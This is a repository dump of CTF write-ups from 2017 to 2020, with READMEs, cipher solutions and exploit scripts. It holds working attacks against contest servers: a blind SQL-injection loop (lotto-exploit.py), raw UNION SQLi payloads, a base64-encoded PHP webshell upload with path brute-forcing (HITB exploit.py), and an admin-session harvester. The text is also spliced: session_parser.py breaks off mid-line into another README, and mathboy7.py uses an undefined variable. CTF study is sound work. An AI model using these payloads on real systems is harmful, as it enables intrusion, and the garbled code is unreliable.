├── 2017
├── Belluminar-2017
│ ├── README.md
│ └── color-world.pdf
├── Christmas-CTF-2017
│ ├── 0-day.md
│ ├── README.md
│ ├── pictube1.html
│ └── session_parser.py
├── H3X0R_CTF2
│ ├── H3X0R_CTF2.pdf
│ └── README.md
├── Layer7_External_CTF(2017)
│ └── README.md
├── Layer7_Internal_CTF
│ ├── Layer7_Internal_CTF_2017.pdf
│ └── README.md
├── Power_of_XX(2017)
│ └── README.md
├── Root-CTF
│ ├── Write.pdf
│ ├── calculate_decoder.py
│ └── lotto-exploit.py
├── Secuinside2017-Mathboy7
│ ├── README.md
│ └── mathboy7.py
├── Sunrin_Internal_CTF2017
│ └── 젠카이노아이마스.pdf
└── Ubuntu-ctf(2017)
│ ├── README.md
│ └── write-ups.pdf
├── 2018
├── HITB-XCTF-2018-Quals_upload(web)
│ └── exploit.py
├── NeverLAN-CTF(2018)
│ ├── Cryptography
│ │ ├── Don't-Hate-me
│ │ │ ├── README.md
│ │ │ ├── this_is_insane2.jpeg
│ │ │ └── this_is_insane2.zip
│ │ ├── How-much-can-you-throw-on-a-Caesar-salad
│ │ │ └── O_SO_Curious.jpeg
│ │ ├── Picture-Words
│ │ │ ├── Invisible.jpeg
│ │ │ ├── cipher.txt
│ │ │ ├── decrypt_result.txt
│ │ │ └── minimoy0001.gif
│ │ ├── Story-Time!
│ │ │ └── README.md
│ │ ├── That's-a-big-file
│ │ │ ├── Output.txt
│ │ │ ├── base64.c
│ │ │ └── decoder.py
│ │ └── dot-dot-dashish
│ │ │ └── README.md
│ ├── InterWeb
│ │ ├── README.md
│ │ ├── das-blog.png
│ │ └── wpscan.png
│ ├── Passwords
│ │ ├── Ending!=Hash
│ │ │ └── wireshark(flag).png
│ │ ├── SHA-1
│ │ │ ├── README.md
│ │ │ ├── description.txt
│ │ │ ├── failed(python-script)
│ │ │ │ ├── __pycache__
│ │ │ │ │ └── brute.cpython-36.pyc
│ │ │ │ └── brute.py
│ │ │ ├── failed_bruteforce
│ │ │ │ ├── __pycache__
│ │ │ │ │ └── brute.cpython-36.pyc
│ │ │ │ └── brute.py
│ │ │ ├── hash.txt
│ │ │ └── hashcat-4.1.0
│ │ │ │ └── charsets
│ │ │ │ ├── DES_full.charset
│ │ │ │ ├── DES_special
│ │ │ │ ├── DES_alpha.charset
│ │ │ │ ├── DES_numeral.charset
│ │ │ │ └── multiple_nodes
│ │ │ │ │ ├── DES_portion_0.charset
│ │ │ │ │ ├── DES_portion_1.charset
│ │ │ │ │ ├── DES_portion_2.charset
│ │ │ │ │ ├── DES_portion_3.charset
│ │ │ │ │ ├── DES_portion_4.charset
│ │ │ │ │ ├── DES_portion_5.charset
│ │ │ │ │ ├── DES_portion_6.charset
│ │ │ │ │ ├── DES_portion_7.charset
│ │ │ │ │ ├── DES_portion_8.charset
│ │ │ │ │ ├── DES_portion_9.charset
│ │ │ │ │ ├── DES_portion_A.charset
│ │ │ │ │ ├── DES_portion_B.charset
│ │ │ │ │ ├── DES_portion_C.charset
│ │ │ │ │ ├── DES_portion_D.charset
│ │ │ │ │ ├── DES_portion_E.charset
│ │ │ │ │ └── DES_portion_F.charset
│ │ │ │ ├── combined
│ │ │ │ ├── Bulgarian.hcchr
│ │ │ │ ├── Castilian.hcchr
│ │ │ │ ├── Catalan.hcchr
│ │ │ │ ├── English.hcchr
│ │ │ │ ├── French.hcchr
│ │ │ │ ├── German.hcchr
│ │ │ │ ├── Greek.hcchr
│ │ │ │ ├── GreekPolytonic.hcchr
│ │ │ │ ├── Italian.hcchr
│ │ │ │ ├── Lithuanian.hcchr
│ │ │ │ ├── Polish.hcchr
│ │ │ │ ├── Portuguese.hcchr
│ │ │ │ ├── Russian.hcchr
│ │ │ │ ├── Slovak.hcchr
│ │ │ │ └── Spanish.hcchr
│ │ │ │ ├── special
│ │ │ │ ├── Castilian
│ │ │ │ │ ├── es-ES_ISO-8859-1-special.hcchr
│ │ │ │ │ ├── es-ES_ISO-8859-15-special.hcchr
│ │ │ │ │ └── es-ES_cp1252-special.hcchr
│ │ │ │ ├── Catalan
│ │ │ │ │ ├── ca_ISO-8859-1-special.hcchr
│ │ │ │ │ ├── ca_ISO-8859-15-special.hcchr
│ │ │ │ │ └── ca_cp1252-special.hcchr
│ │ │ │ ├── French
│ │ │ │ │ ├── fr_ISO-8859-1-special.hcchr
│ │ │ │ │ ├── fr_ISO-8859-15-special.hcchr
│ │ │ │ │ ├── fr_ISO-8859-16-special.hcchr
│ │ │ │ │ └── fr_cp1252-special.hcchr
│ │ │ │ ├── German
│ │ │ │ │ ├── de_ISO-8859-1-special.hcchr
│ │ │ │ │ ├── de_ISO-8859-15-special.hcchr
│ │ │ │ │ └── de_cp1252-special.hcchr
│ │ │ │ ├── Greek
│ │ │ │ │ ├── el_ISO-8859-7-special.hcchr
│ │ │ │ │ └── el_cp1253-special.hcchr
│ │ │ │ ├── Italian
│ │ │ │ │ ├── it_ISO-8859-1-special.hcchr
│ │ │ │ │ ├── it_ISO-8859-15-special.hcchr
│ │ │ │ │ └── it_cp1252-special.hcchr
│ │ │ │ ├── Polish
│ │ │ │ │ └── pl_cp1250-special.hcchr
│ │ │ │ ├── Portuguese
│ │ │ │ │ ├── pt_ISO-8859-1-special.hcchr
│ │ │ │ │ ├── pt_ISO-8859-15-special.hcchr
│ │ │ │ │ └── pt_cp1252-special.hcchr
│ │ │ │ ├── Russian
│ │ │ │ │ ├── ru_ISO-8859-5-special.hcchr
│ │ │ │ │ └── ru_cp1251-special.hcchr
│ │ │ │ ├── Slovak
│ │ │ │ │ ├── sk_ISO-8859-2-special.hcchr
│ │ │ │ │ └── sk_cp1250-special.hcchr
│ │ │ │ └── Spanish
│ │ │ │ │ ├── es_ISO-8859-1-special.hcchr
│ │ │ │ │ ├── es_ISO-8859-15-special.hcchr
│ │ │ │ │ └── es_cp1252-special.hcchr
│ │ │ │ └── standard
│ │ │ │ ├── Bulgarian
│ │ │ │ ├── bg_ISO-8859-5.hcchr
│ │ │ │ ├── bg_KOI8-R.hcchr
│ │ │ │ └── bg_cp1251.hcchr
│ │ │ │ ├── Castilian
│ │ │ │ ├── es-ES_ISO-8859-1.hcchr
│ │ │ │ ├── es-ES_ISO-8859-15.hcchr
│ │ │ │ └── es-ES_cp1252.hcchr
│ │ │ │ ├── Catalan
│ │ │ │ ├── ca_ISO-8859-1.hcchr
│ │ │ │ ├── ca_ISO-8859-15.hcchr
│ │ │ │ └── ca_cp1252.hcchr
│ │ │ │ ├── English
│ │ │ │ ├── en_ISO-8859-1.hcchr
│ │ │ │ ├── en_ISO-8859-15.hcchr
│ │ │ │ └── en_cp1252.hcchr
│ │ │ │ └── French
│ │ │ │ ├── fr_ISO-8859-1.hcchr
│ │ │ │ ├── fr_ISO-8859-15.hcchr
│ │ │ │ └── fr_cp1252.hcchr
│ │ ├── The-WIFI-Network
│ │ │ ├── README.md
│ │ │ ├── flag.png
│ │ │ ├── neverlan.cap
│ │ │ └── neverlan.hccapx
│ │ └── Zip-Attack
│ │ │ ├── README.md
│ │ │ ├── encrypted.zip
│ │ │ ├── known-file.zip
│ │ │ └── sw-iphone-wallpaper-first-order.jpg
│ ├── README.md
│ ├── Recon
│ │ ├── Happy hunting.txt
│ │ ├── Neo's-recon.png
│ │ ├── Purvesta's-recon.png
│ │ ├── Viking's-recon.png
│ │ ├── Zesty's-challenge.png
│ │ └── s7a73farm's-recon.png
│ ├── Reversing
│ │ └── Commitment-Issues
│ │ │ └── Commitmen-Issues(flag).png
│ ├── Scripting
│ │ ├── JSON-parsing-1
│ │ │ ├── file-20171020T1500
│ │ │ └── statistics.py
│ │ ├── basic-math
│ │ │ └── sum.py
│ │ ├── even-more-basic-math-with-some-junk
│ │ │ ├── even_more_numbers_with_some_mild_inconveniences.txt
│ │ │ └── sum.py
│ │ └── more-basic-math
│ │ │ ├── some_more_numbers.txt
│ │ │ └── sum.py
│ ├── Trivia
│ │ ├── How_far_can_you_go(not-solved)
│ │ │ ├── 1.txt
│ │ │ ├── 2.zip
│ │ │ ├── 3.zip
│ │ │ └── Alice.zip
│ │ └── README.md
│ ├── challenge-screenshot.png
│ └── ranking-screenshot.png
└── Timisoara-CTF-2018-Final
│ └── README.md
├── 2019
└── 19Cyberoc
│ ├── 19Cyberoc - Secret Service (Hidden Service) Write up.pdf
│ ├── README.md
│ └── flag.png
├── 2020
└── Defenit_CTF
│ ├── web1-fortune-cookie
│ └── exploit.py
│ ├── web2-highlighter
│ └── tq.txt
│ ├── web3-tar-analyzer
│ ├── .COMMAND
│ ├── .SET_ADMIN
│ └── exploit.py
│ └── web4-babyjs
│ └── exploit.py
└── README.md
/2017/Belluminar-2017/README.md:
--------------------------------------------------------------------------------
1 | # Belluminar-2017-Color-word
2 |
3 | ~~~
4 |
5 | prob : color-world
6 | date : 2017.11.09
7 |
8 | made by munsiwoo
9 |
10 | ~~~
11 |
--------------------------------------------------------------------------------
/2017/Belluminar-2017/color-world.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2017/Belluminar-2017/color-world.pdf
--------------------------------------------------------------------------------
/2017/Christmas-CTF-2017/0-day.md:
--------------------------------------------------------------------------------
1 | ### 0-day 삽질한거
2 |
3 | ~~~
4 | 1. 파일 업로드에서 shtml, xml, xhtml 등 올려서 rce, xxe 시도
5 | 2. sqli, lfi 찾다가 안보여서 포기
6 | 3. 세션에서 admin 계정 찾아보기 (session_parser.py 참고)
7 | ~~~
8 |
9 | ~~~
10 | 결론 : 진짜 0-day 였다.
11 | ~~~
12 |
--------------------------------------------------------------------------------
/2017/Christmas-CTF-2017/README.md:
--------------------------------------------------------------------------------
1 | # x mas-ctf-2017 (1st)
2 |
3 |
4 | #### session-parser.py
5 | ~~~
6 | 그누보드에는 /data/session/에서 세션을 관리한다.
7 | /data/session/에 있는 세션에서 admin 세션을 찾는 스크립트
8 | ~~~
9 |
10 | #### 0-day.md
11 | ~~~
12 | 0-day 문제 풀면서 삽질했던 거 정리해봤다.
13 | ~~~
14 |
15 | #### pictube1.html
16 | ~~~
17 | 픽튜브1 풀며 원평이형, 석찬이와 삽질했던 내용이다.
18 | 픽튜브1는 거의 다 풀었는데 대회가 끝나버렸다.
19 | pictube1.html 와 같은 방식으로 풀 수 있고, jsfuck 난독화를 해서 풀수도 있었다.
20 | 내가 쓴 pictube1.html 방법은 ([]+prompt)[0] 이런식으로 문자를 만들고
21 | self['docu'+'ment']['cookie'] 이렇게 'document', 'cookie'자리에 넣어서
22 | 객체에 접근하거나 함수를 실행시키는 방식이었는데, location이 사용 불가능하다는 것을
23 | 대회 끝나고 알았다. 다음에는 location 말고도 여러 방법으로 접근해봐야겠다.
24 | ~~~
25 |
--------------------------------------------------------------------------------
/2017/Christmas-CTF-2017/pictube1.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
--------------------------------------------------------------------------------
/2017/Christmas-CTF-2017/session_parser.py:
--------------------------------------------------------------------------------
1 | import requests
2 | from bs4 import BeautifulSoup
3 |
4 | # made by munsiwoo
5 |
6 | url = "http://45.32.105.237/data/session/?C=S;O=D"
7 | html = requests.get(url).text
8 | soup = BeautifulSoup(html, 'html.parser')
9 | admin_session = []
10 |
11 | for x in range(5, html.count(" can you bypass me? - regexp bypass, wild card, eval injection
4 |
5 | > daily life of Daniel - xss with bbcode bypass
6 |
7 | > present - reflected xss
8 | ------------------------------------
9 | http://siwoomun.blogspot.kr/2017/10/layer7-external-ctf-2017-write-ups.html
--------------------------------------------------------------------------------
/2017/Layer7_Internal_CTF/Layer7_Internal_CTF_2017.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2017/Layer7_Internal_CTF/Layer7_Internal_CTF_2017.pdf
--------------------------------------------------------------------------------
/2017/Layer7_Internal_CTF/README.md:
--------------------------------------------------------------------------------
1 | Layer7 Internal CTF (2017)
2 | =============
3 | 2017-08-19 09:00 ~ 2017-08-19 21:00
4 | -------------
5 | ###### ctf.layer7.kr
--------------------------------------------------------------------------------
/2017/Power_of_XX(2017)/README.md:
--------------------------------------------------------------------------------
1 | # Power-of-XX-2017_CTF-Write-ups
2 |
3 | > Basic Web ( LFI + BSQLi )
4 |
5 | https://github.com/munsiwoo/problems/blob/master/power_of_xx_2017/basic_web/exploit.py
6 |
7 | > sqlgame (SQLi)
8 |
9 | 1+union+select+0x303037,1,1%23'+union+select+1,0x62616e67,schema()%23"+union+select+1,2,'007'%23
10 |
11 | ------------------------------------
12 | http://siwoomun.blogspot.kr/2017/10/power-of-xx-2017-write-ups.html
13 |
--------------------------------------------------------------------------------
/2017/Root-CTF/Write.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2017/Root-CTF/Write.pdf
--------------------------------------------------------------------------------
/2017/Root-CTF/calculate_decoder.py:
--------------------------------------------------------------------------------
1 | """
2 | Root CTF - calculate
3 | made by munsiwoo
4 | """
5 |
6 | def a(num, size):
7 | r = num + size
8 | r += 915
9 | return r
10 |
11 | def b(num, size):
12 | r = num - size
13 | r -= 372
14 | return r
15 |
16 | def c(num, size):
17 | r = num ^ size
18 | r ^= 826
19 | return r
20 |
21 | def d(num, size):
22 | size %= 32
23 | r = num >> (32 - size)
24 | b = (num << size) - (r << 32)
25 | return b + r
26 |
27 | def enc(argv):
28 | argv = a(ord(argv), 100)
29 | argv = b(argv, 100)
30 | argv = c(argv, 100)
31 | argv = d(argv, 100)
32 | return argv
33 |
34 | def main() :
35 | flag = [5040, 4944, 5088, 4992, 7232, 4848, 7584, 7344, 4288, 7408, 7360, 7584, 4608, 4880, 4320, 7328, 7360,
36 | 4608, 4896, 4320, 7472, 7328, 7360, 4608, 4752, 4368, 4848, 4608, 4848, 4368, 4944, 7200]
37 |
38 | alpha1 = "abcdefghijklmnopqrstuvwxyz"
39 | alpha2 = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
40 | special = "!@#$%^&*()-_+=[]{}\;:\'\"<>,./"
41 | number = "0123456789"
42 | chars = alpha1+alpha2+special+number
43 | table = {}
44 |
45 | for x in chars :
46 | table[str(enc(x))] = str(x)
47 |
48 | for x in flag :
49 | print(table[str(x)], end="")
50 |
51 | print()
52 |
53 | if __name__ == "__main__" :
54 | main()
--------------------------------------------------------------------------------
/2017/Root-CTF/lotto-exploit.py:
--------------------------------------------------------------------------------
1 | import requests
2 | from urllib.parse import quote
3 |
4 | user = (lambda a,b,c:"http://sdhsroot.kro.kr/HexLotto/data/%s.php?id=%s&pw=%s"%(a,b,c))
5 | payload = (lambda a:"'&&(select database())like('"+a+"%')#")
6 | data = "num[]=0&num[]=0&num[]=0&num[]=0&num[]=0&num[]=0"
7 | result = ""
8 |
9 | # table : hexlotto
10 | # columns : id, pw, point, number
11 |
12 | # 풀이 : 새로 가입한 뒤 해당 계정의 number를 가져와 로또 번호에 넣으면 당첨이다.
13 |
14 | for x in range(0, 20) :
15 | for y in ".0123456789abcdefghijklmnopqrstuvwxyz()-_" :
16 | username = quote(payload(result+y))
17 | print(payload(result+y))
18 | requests.get(user('signup', username, username))
19 | req = requests.get(user('login', username, username))
20 | requests.post("http://sdhsroot.kro.kr/HexLotto/data/lotto.php", data=data, cookies=req.cookies)
21 | res = requests.post("http://sdhsroot.kro.kr/HexLotto/data/lotto.php", data=data, cookies=req.cookies).content
22 | requests.get("http://sdhsroot.kro.kr/HexLotto/data/lotto.php", cookies=req.cookies)
23 |
24 | if(str(res).find("alert") == -1) :
25 | result += y
26 | break
27 | if(y == '_') :
28 | print("result : "+result)
29 | exit(1)
30 |
31 |
--------------------------------------------------------------------------------
/2017/Secuinside2017-Mathboy7/README.md:
--------------------------------------------------------------------------------
1 | Mathboy7 Write-up
2 | -------------
3 | ### 2017.07.01 09:00(KST) - 07.02 16:33(KST)
4 | *****
5 | #### https://siwoomun.blogspot.kr/2017/07/secuinside-ctf-2017-mathboy7-write-up.html
--------------------------------------------------------------------------------
/2017/Secuinside2017-Mathboy7/mathboy7.py:
--------------------------------------------------------------------------------
1 | # -*- coding:utf-8 -*-
2 |
3 | # github.com/munsiwoo
4 |
5 | import httplib, urllib2
6 |
7 | conn = httplib.HTTPConnection('52.78.77.229')
8 | header = {'Content-Type': 'application/x-www-form-urlencoded'}
9 |
10 | param1 = '/index.php?id=%bf\&pw='
11 | param2 = 'union select mid(encrypt(rand(),mid(password(pi()),floor(pi()*pi()*floor(pi()))+ceil(pi()+pi()),true+true)),true,pi()+true+true),true,true#' # payload
12 | query = param1 + urllib2.quote(param2)
13 |
14 | while(1):
15 | conn.request('GET', query3, '', header)
16 | response = str(conn.getresponse().read())
17 | # response[33:38] == 'ad' + random three characters
18 |
19 | admin = response[33:38].lower()
20 |
21 | if(admin == 'admin'):
22 | print response
23 | break
24 |
25 | conn.close()
--------------------------------------------------------------------------------
/2017/Sunrin_Internal_CTF2017/젠카이노아이마스.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2017/Sunrin_Internal_CTF2017/젠카이노아이마스.pdf
--------------------------------------------------------------------------------
/2017/Ubuntu-ctf(2017)/README.md:
--------------------------------------------------------------------------------
1 | # Kookmin-univ & Ubuntu CTF
2 | ~~~
3 | 날짜 : 2017.11.05
4 | 팀명 : 새싹보끔밥 (3rd)
5 | ~~~
--------------------------------------------------------------------------------
/2017/Ubuntu-ctf(2017)/write-ups.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2017/Ubuntu-ctf(2017)/write-ups.pdf
--------------------------------------------------------------------------------
/2018/HITB-XCTF-2018-Quals_upload(web)/exploit.py:
--------------------------------------------------------------------------------
1 | from requests import get, post
2 | from base64 import b64decode
3 |
4 | '''
5 | hitb xctf 2018 quals
6 | upload (web) - windows directory wildcard
7 |
8 | made by munsiwoo
9 | '''
10 |
11 | def length_adjust(argv) :
12 | length = 32 - len(argv)
13 | for x in range(length) :
14 | argv += '>'
15 | return argv
16 |
17 | def webshell_upload() :
18 | uri = 'http://47.90.97.18:9999/upload.php'
19 | headers = {'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryx96MAR4SB4Yfdvog'}
20 |
21 | body = 'LS0tLS0tV2ViS2l0Rm9ybUJvdW5kYXJ5eDk2TUFSNFNCNFlmZHZvZwpDb250ZW50LURp'
22 | body += 'c3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImZpbGUiOyBmaWxlbmFtZT0iLlBIUCIK'
23 | body += 'Q29udGVudC1UeXBlOiBpbWFnZS9wbmcKCkdJRjg5YS4uLi4uLjw/cGhwIGVjaG8gZmls'
24 | body += 'ZV9nZXRfY29udGVudHMoJy4uL2ZsYWcucGhwJyk7ID8+Ci0tLS0tLVdlYktpdEZvcm1C'
25 | body += 'b3VuZGFyeXg5Nk1BUjRTQjRZZmR2b2cKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1k'
26 | body += 'YXRhOyBuYW1lPSJzdWJtaXQiCgp1cGxvYWQKLS0tLS0tV2ViS2l0Rm9ybUJvdW5kYXJ5'
27 | body += 'eDk2TUFSNFNCNFlmZHZvZy0t' #
28 |
29 | body = b64decode(body).decode()
30 | return post(uri, headers=headers, data=body).text[1:]
31 |
32 | def main() :
33 | uri = 'http://47.90.97.18:9999/'
34 | payload = (lambda x,y:'pic.php?filename=../{}/{}'.format(x,y))
35 | webshell = webshell_upload()
36 | directory = '87194f13726af7cee27ba2cfe97b60'
37 | # directory = '87194f13726af7cee27ba2cfe97b60df'
38 | # flag is in the /flag.php
39 |
40 | for x in range(len(directory), 32) :
41 | for y in 'abcdef0123456789' :
42 | request = uri + payload(length_adjust(directory + y), webshell)
43 | response = get(request).text
44 |
45 | if(response.find("image error") == -1) :
46 | directory += y
47 | break
48 |
49 | print('directory : ' + directory)
50 |
51 | print(get(uri + directory + '/' + webshell).text)
52 |
53 |
54 | if __name__ == '__main__' :
55 | main()
56 |
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Cryptography/Don't-Hate-me/README.md:
--------------------------------------------------------------------------------
1 | # Don't-Hate-me (600)
2 |
3 |
4 | 첫번째 힌트로 압축파일의 비밀번호를 알 수 있었다.
5 |
6 | 그리고 춤추는 졸라맨이 가득한 사진을 볼 수 있는데
7 |
8 | 이건 텐달러 CTF에서 한번 풀어봤던 Dancing men ciper다.
9 |
10 | (https://www.dcode.fr/dancing-men-cipher)
11 |
12 |
13 |
14 | ~~~
15 | 1. kjhtcriw
16 | 2. ruodhcvc
17 | 3. xnhddhck
18 | 4. cjniuicc
19 | 5. ppzckwkw
20 | 6. ecxffqbn
21 | 7. rgjwzdgw
22 | 8. gyovofmn
23 | 9. obdrhcqj
24 | 10. asxowcpl
25 | 11. jbktzdyr
26 | 12. rhohmnst
27 | 13. fumeeeux
28 | 14. zmugwtxz
29 | 15. mtjzefeq
30 | 16. kztgkzup
31 |
32 |
33 | kjhtcriwruodhcvcxnhddhckcjniuiccppzckwkwecxffqbnrgjwzdgwgyovofmnobdrhcqjasxowcpljbktzdyrrhohmnstfumeeeuxzmugwtxzmtjzefeqkztgkzup
34 |
35 | kjhtcriwruodhcvcxnhddhckcjniuiccppzckwkwecxffqbnrgjwzdgwgyovofmnobdrhcqjasxowcpljbktzdyrrhohmnstfumeeeuxzmugwtxzmtjzefeqkztgkzup
36 |
37 | kztgkzupmtjzefeqzmugwtxzfumeeeuxrhohmnstjbktzdyrasxowcplobdrhcqjgyovofmnrgjwzdgwecxffqbnppzckwkwcjniuiccxnhddhckruodhcvckjhtcriw
38 | ~~~
39 |
40 | 비네제르 사이퍼라고 생각해서 이것 저것 시도해봤지만 결국 못풀었다.
41 |
42 |
43 |
44 | maybe vigenere cipher..
45 |
46 | but i failed to key crack :(
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Cryptography/Don't-Hate-me/this_is_insane2.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Cryptography/Don't-Hate-me/this_is_insane2.jpeg
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Cryptography/Don't-Hate-me/this_is_insane2.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Cryptography/Don't-Hate-me/this_is_insane2.zip
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Cryptography/How-much-can-you-throw-on-a-Caesar-salad/O_SO_Curious.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Cryptography/How-much-can-you-throw-on-a-Caesar-salad/O_SO_Curious.jpeg
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Cryptography/Picture-Words/Invisible.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Cryptography/Picture-Words/Invisible.jpeg
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Cryptography/Picture-Words/cipher.txt:
--------------------------------------------------------------------------------
1 | https://www.dcode.fr/arthur-invisibles-cipher
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Cryptography/Picture-Words/decrypt_result.txt:
--------------------------------------------------------------------------------
1 | WHENSOLVIN
2 | GPROBLEMSD
3 | IGATTHEROO
4 | TSINSTEADO
5 | FJUSTHACKI
6 | NGATTHELEA
7 | VESFLAGISP
8 | ICTURESWOR
9 | THATHOUSAN
10 | DWORDS
11 |
12 | WHEN SO LVING PROBLEMS DIGAT THE ROOTS IN STEAD OF JUST HACKING AT THE LEAVES FLAG IS PICTURESWORTHATHOUSANDWORDS
13 |
14 | flag is pictures worth a thousand words
15 |
16 | flag{pictures worth a thousand words}
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Cryptography/Picture-Words/minimoy0001.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Cryptography/Picture-Words/minimoy0001.gif
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Cryptography/Story-Time!/README.md:
--------------------------------------------------------------------------------
1 | # Story Time! (200)
2 |
3 | ~~~
4 | Don't Hate me 문제를 푼는 도중
5 | dcode.fr를 돌아다니다가 Story Time!에서 본 Chipher랑 비슷하게 생긴 Decoder를 찾았고
6 | Story Time의 Cipher text를 올려서 돌려보니 flag가 나왔다.
7 | (https://www.dcode.fr/gold-bug-poe)
8 |
9 |
10 | CAPTAI KIDD USED THE GOLD BUG CIPHER TO HIDE THE LOCATIO OF HIS TREASURE I A STORY WRITTE BY EDGAR ALLA POE I FLAG IS PIRATESANDDAGGERS
11 |
12 | FLAG{PIRATESANDDAGGERS}
13 | ~~~
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Cryptography/That's-a-big-file/base64.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 |
6 | char str[900000000];
7 | char tmp[900000000];
8 |
9 | static const char MimeBase64[] = {
10 | 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H',
11 | 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P',
12 | 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X',
13 | 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f',
14 | 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n',
15 | 'o', 'p', 'q', 'r', 's', 't', 'u', 'v',
16 | 'w', 'x', 'y', 'z', '0', '1', '2', '3',
17 | '4', '5', '6', '7', '8', '9', '+', '/'
18 | };
19 |
20 | static int DecodeMimeBase64[256] = {
21 | -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1, /* 00-0F */
22 | -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1, /* 10-1F */
23 | -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63, /* 20-2F */
24 | 52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1, /* 30-3F */
25 | -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9,10,11,12,13,14, /* 40-4F */
26 | 15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1, /* 50-5F */
27 | -1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40, /* 60-6F */
28 | 41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1, /* 70-7F */
29 | -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1, /* 80-8F */
30 | -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1, /* 90-9F */
31 | -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1, /* A0-AF */
32 | -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1, /* B0-BF */
33 | -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1, /* C0-CF */
34 | -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1, /* D0-DF */
35 | -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1, /* E0-EF */
36 | -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1 /* F0-FF */
37 | };
38 |
39 | typedef union{
40 | struct{
41 | unsigned char c1,c2,c3;
42 | };
43 | struct{
44 | unsigned int e1:6,e2:6,e3:6,e4:6;
45 | };
46 | } BF;
47 |
48 | void base64e(char *src, char *result, int length){
49 | int i, j = 0;
50 | BF temp;
51 |
52 | for(i = 0 ; i < length ; i = i+3, j = j+4){
53 | temp.c3 = src[i];
54 | if((i+1) > length) temp.c2 = 0x00;
55 | else temp.c2 = src[i+1];
56 | if((i+2) > length) temp.c1 = 0x00;
57 | else temp.c1 = src[i+2];
58 |
59 | result[j] = MimeBase64[temp.e4];
60 | result[j+1] = MimeBase64[temp.e3];
61 | result[j+2] = MimeBase64[temp.e2];
62 | result[j+3] = MimeBase64[temp.e1];
63 |
64 | if((i+2) > length) result[j+2] = '=';
65 | if((i+3) > length) result[j+3] = '=';
66 | }
67 | }
68 |
69 | void base64d(char *src, char *result, int *length){
70 | int i, j = 0, src_length, blank = 0;
71 | BF temp;
72 |
73 | src_length = strlen(src);
74 |
75 | for(i = 0 ; i < src_length ; i = i+4, j = j+3){
76 | temp.e4 = DecodeMimeBase64[src[i]];
77 | temp.e3 = DecodeMimeBase64[src[i+1]];
78 | if(src[i+2] == '='){
79 | temp.e2 = 0x00;
80 | blank++;
81 | } else temp.e2 = DecodeMimeBase64[src[i+2]];
82 | if(src[i+3] == '='){
83 | temp.e1 = 0x00;
84 | blank++;
85 | } else temp.e1 = DecodeMimeBase64[src[i+3]];
86 |
87 | result[j] = temp.c3;
88 | result[j+1] = temp.c2;
89 | result[j+2] = temp.c1;
